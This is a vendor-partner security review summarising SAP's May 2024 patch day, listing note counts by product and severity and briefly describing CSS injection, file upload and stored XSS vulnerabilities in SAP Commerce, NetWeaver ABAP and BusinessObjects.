Overview
SAP’s security patch day for May 2024 has seen the release of 15 OSS SAP security notes. Two notes have been classified as critical, one as high, nine as medium, and two as low based on CVSS v3.0 Rating.
Three notes have been released for:
- SAP S/4HANA
- SAP NetWeaver AS ABAP
Two notes have been released for:
- SAP BusinessObjects
- SAP NetWeaver AS JAVA
Single notes have been released for:
- SAP Commerce
- SAP My Travel Requests
- SAPUI5
- SAP Replication Server
- SAP Global Label Management
Vulnerabilities: May 2024 Highlights
[CVE-2019-17495] Multiple vulnerabilities in SAP CX Commerce (SAP Note 3455438)
SAP Commerce uses the Swagger UI component, which is vulnerable to CSS injections. This vulnerability enables attackers to perform a Relative Path Overwrite (RPO) technique in the CSS-based input fields, posing high risks to the confidentiality, integrity, and availability of the application.
Included in the same note is a vulnerability with Apache Calcite Avatica. This can lead to remote code execution, which also poses a high risk to the confidentiality, integrity, and availability of the application.
[CVE-2024-33006] File upload vulnerability in SAP NetWeaver Application Server ABAP and ABAP Platform (SAP Note 3448171)
An unauthenticated attacker can upload a malicious file to the server, which, when accessed by a victim, allows the attacker to compromise the system completely.
[CVE-2024-28165] Cross site scripting vulnerability in SAP BusinessObjects Business Intelligence Platform (SAP Note 3431794)
SAP Business Objects Business Intelligence Platform is vulnerable to stored XSS. An attacker can manipulate a parameter in the OpenDocument URL, which could significantly impact the application’s confidentiality and integrity.
About this Review
On the second Tuesday of each month, SAP release security updates to their software products. At Absoft, we analyse all of the released security updates and produce this security review, including sending bespoke recommendations for each of our managed service customers.
There is more information on how we handle SAP security updates, including information on SAP’s process, the CVE process and the CVSS base scores in our earlier article on addressing security vulnerabilities in SAP software.
